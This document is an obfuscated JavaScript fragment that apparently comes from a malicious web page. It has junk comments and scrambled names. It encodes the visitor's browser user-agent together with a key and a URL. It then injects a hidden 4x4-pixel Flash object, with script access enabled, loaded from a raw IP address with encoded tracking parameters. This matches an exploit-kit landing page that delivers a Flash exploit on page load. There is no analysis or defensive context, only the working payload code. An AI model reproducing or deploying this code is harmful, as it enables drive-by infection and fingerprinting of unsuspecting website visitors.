/*s73838d60844hssfj7939fs*/function hgfgerdfgdf(num, width){/*s20040d94686hfj69543fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s61814d85361hfj43443fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s27943d41051hfj30849fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s44762d77672hfj58885fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd77747hfs*/c += b + d;/*s54467d83298hfj73420fs*/e += 1;}return c;}/*s7689dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.119.203/?NTk1NjIyNjA=&new=xX_QMvWdbRXQC53EKvrcT6NHMVHRH0CL2YydmrHQefjaelWkzrHFTF_yozKASwSG6_JtdfJRDQ&slim=fjjBCIeAdpm9pfB1MT9av92kOHyEWd1sTW_ByEaAsQ95eXHeVv2VX8mbAkcskmwhWD61ETi-tL&tweaks=MTY3MDk1NzM=&travel=Mjg3NTg3NjY=", ghnvbn("http://92.53.119.203/?OTI4NjEzNDY=&tweaks=MzY4NDk0MzQ=&new=xX_QMvWebRXQC53EKvncT6NHMVHRHECL2Y-dmrHTefjaeVWkzrLFTF_yozKASwSG6_FtdfJSDQ&slim=fjjxCIeAdpm9pcB1MT9av92kCHyEWd1sTW_xyEaAgQ95eXHeVv2VX8mbAkecolxx-L61ENjOge&travel=NDA0ODIzNDk=","gexywoaxor"));